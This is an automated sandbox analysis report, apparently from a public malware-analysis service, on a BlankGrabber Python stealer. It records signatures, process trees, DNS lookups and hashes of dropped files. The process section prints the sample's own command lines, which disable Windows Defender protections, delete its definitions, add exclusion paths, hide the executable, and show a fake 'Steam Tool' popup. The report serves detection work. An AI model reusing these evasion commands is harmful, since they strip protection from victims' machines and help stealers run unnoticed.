Malware Analysis Report

2024-10-10 08:31

Sample ID 240621-dh27ta1bjk
Target 8329370648873513ab96c3754868c3d3.bin
SHA256 1b113b3fc34dddb83d165a91e37bcf00afe61dbdf4be216e6ef518aeae7e47cf
Tags
blankgrabber upx defense_evasion execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1b113b3fc34dddb83d165a91e37bcf00afe61dbdf4be216e6ef518aeae7e47cf

Threat Level: Known bad

The file 8329370648873513ab96c3754868c3d3.bin was found to be: Known bad.

Malicious Activity Summary

blankgrabber upx defense_evasion execution

A stealer written in Python and packaged with PyInstaller

Blankgrabber family

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

UPX packed file

Hide Artifacts: Hidden Files and Directories

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Detects videocard installed

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 03:01

Signatures

A stealer written in Python and packaged with PyInstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 03:01

Reported

2024-06-21 03:04

Platform

win7-20240611-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI21922\python311.dll

MD5 1e76961ca11f929e4213fca8272d0194
SHA1 e52763b7ba970c3b14554065f8c2404112f53596
SHA256 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0
SHA512 ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

memory/3040-23-0x000007FEF5F40000-0x000007FEF652A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-21 03:01

Reported

2024-06-21 03:04

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2024 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe
PID 2024 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe
PID 1548 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 3456 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1068 wrote to memory of 1648 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1068 wrote to memory of 1648 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3256 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3428 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3428 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1548 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 2332 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2332 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 4608 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4608 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1548 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 3424 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3424 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1548 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 2496 wrote to memory of 3688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2496 wrote to memory of 3688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 3312 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3312 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1952 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3152 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3152 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Steam Tool is extracting | ETA : 3 Minutes', 0, '[Steam Tool] Downloading..', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe'

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Steam Tool is extracting | ETA : 3 Minutes', 0, '[Steam Tool] Downloading..', 48+16);close()"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 blank-j1ekc.in udp
US 8.8.8.8:53 blank-j1ekc.in udp
US 8.8.8.8:53 blank-j1ekc.in udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI20242\python311.dll

MD5 1e76961ca11f929e4213fca8272d0194
SHA1 e52763b7ba970c3b14554065f8c2404112f53596
SHA256 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0
SHA512 ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

C:\Users\Admin\AppData\Local\Temp\_MEI20242\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

memory/1548-25-0x00007FFE77330000-0x00007FFE7791A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI20242\base_library.zip

MD5 2efeab81308c47666dfffc980b9fe559
SHA1 8fbb7bbdb97e888220df45cc5732595961dbe067
SHA256 a20eeb4ba2069863d40e4feab2136ca5be183887b6368e32f1a12c780a5af1ad
SHA512 39b030931a7a5940edc40607dcc9da7ca1bf479e34ebf45a1623a67d38b98eb4337b047cc8261038d27ed9e9d6f2b120abbf140c6c90d866cdba0a4c810ac32c

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_ctypes.pyd

MD5 7ecc651b0bcf9b93747a710d67f6c457
SHA1 ebb6dcd3998af9fff869184017f2106d7a9c18f3
SHA256 b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a
SHA512 1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5

C:\Users\Admin\AppData\Local\Temp\_MEI20242\libffi-8.dll

MD5 87786718f8c46d4b870f46bcb9df7499
SHA1 a63098aabe72a3ed58def0b59f5671f2fd58650b
SHA256 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33
SHA512 3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_ssl.pyd

MD5 8f94142c7b4015e780011c1b883a2b2f
SHA1 c9c3c1277cca1e8fe8db366ca0ecb4a264048f05
SHA256 8b6c028a327e887f1b2ccd35661c4c7c499160e0680ca193b5c818327a72838c
SHA512 7e29163a83601ed1078c03004b3d40542e261fda3b15f22c2feec2531b05254189ae1809c71f9df78a460bf2282635e2287617f2992b6b101854ddd74fcad143

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_sqlite3.pyd

MD5 72a0715cb59c5a84a9d232c95f45bf57
SHA1 3ed02aa8c18f793e7d16cc476348c10ce259feb7
SHA256 d125e113e69a49e46c5534040080bdb35b403eb4ff4e74abf963bce84a6c26ad
SHA512 73c0e768ee0c2e6ac660338d2268540254efe44901e17271595f20f335ada3a9a8af70845e8a253d83a848d800145f7ecb23c92be90e7dd6e5400f72122d09de

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_socket.pyd

MD5 57dc6a74a8f2faaca1ba5d330d7c8b4b
SHA1 905d90741342ac566b02808ad0f69e552bb08930
SHA256 5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca
SHA512 5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_queue.pyd

MD5 f1e7c157b687c7e041deadd112d61316
SHA1 2a7445173518a342d2e39b19825cf3e3c839a5fe
SHA256 d92eadb90aed96acb5fac03bc79553f4549035ea2e9d03713d420c236cd37339
SHA512 982fd974e5892af9f360dc4c7ccaa59928e395ccef8ea675fadb4cf5f16b29350bf44c91ea1fd58d90cbca02522eba9543162e19c38817edbfd118bc254515da

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_lzma.pyd

MD5 71f0b9f90aa4bb5e605df0ea58673578
SHA1 c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e
SHA256 d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535
SHA512 fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_hashlib.pyd

MD5 7edb6c172c0e44913e166abb50e6fba6
SHA1 3f8c7d0ff8981d49843372572f93a6923f61e8ed
SHA256 258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531
SHA512 2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_decimal.pyd

MD5 0cfe09615338c6450ac48dd386f545fd
SHA1 61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe
SHA256 a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3
SHA512 42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_bz2.pyd

MD5 83b5d1943ac896a785da5343614b16bc
SHA1 9d94b7f374030fed7f6e876434907561a496f5d9
SHA256 bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a
SHA512 5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

C:\Users\Admin\AppData\Local\Temp\_MEI20242\unicodedata.pyd

MD5 908e8c719267692de04434ab9527f16e
SHA1 5657def35fbd3e5e088853f805eddd6b7b2b3ce9
SHA256 4337d02a4b24467a48b37f1ccbcebd1476ff10bdb6511fbb80030bbe45a25239
SHA512 4f9912803f1fa9f8a376f56e40a6608a0b398915b346d50b6539737f9b75d8e9a905beb5aace5fe69ba8847d815c600eb20330e79a2492168735b5cfdceff39a

C:\Users\Admin\AppData\Local\Temp\_MEI20242\sqlite3.dll

MD5 abe8eec6b8876ddad5a7d60640664f40
SHA1 0b3b948a1a29548a73aaf8d8148ab97616210473
SHA256 26fc80633494181388cf382f417389c59c28e9ffedde8c391d95eddb6840b20d
SHA512 de978d97c04bad9ebb3f423210cbcb1b78a07c21daadc5c166e00206ece8dcd7baac1d67c84923c9cc79c8b9dfbec719ce7b5f17343a069527bba1a4d0454c29

C:\Users\Admin\AppData\Local\Temp\_MEI20242\select.pyd

MD5 938c814cc992fe0ba83c6f0c78d93d3f
SHA1 e7c97e733826e53ff5f1317b947bb3ef76adb520
SHA256 9c9b62c84c2373ba509c42adbca01ad184cd525a81ccbcc92991e0f84735696e
SHA512 2f175f575e49de4b8b820171565aedb7474d52ae9914e0a541d994ff9fea38971dd5a34ee30cc570920b8618393fc40ab08699af731005542e02a6a0095691f0

C:\Users\Admin\AppData\Local\Temp\_MEI20242\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI20242\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI20242\libssl-1_1.dll

MD5 7bcb0f97635b91097398fd1b7410b3bc
SHA1 7d4fc6b820c465d46f934a5610bc215263ee6d3e
SHA256 abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e
SHA512 835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c

C:\Users\Admin\AppData\Local\Temp\_MEI20242\libcrypto-1_1.dll

MD5 e5aecaf59c67d6dd7c7979dfb49ed3b0
SHA1 b0a292065e1b3875f015277b90d183b875451450
SHA256 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1
SHA512 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

C:\Users\Admin\AppData\Local\Temp\_MEI20242\blank.aes

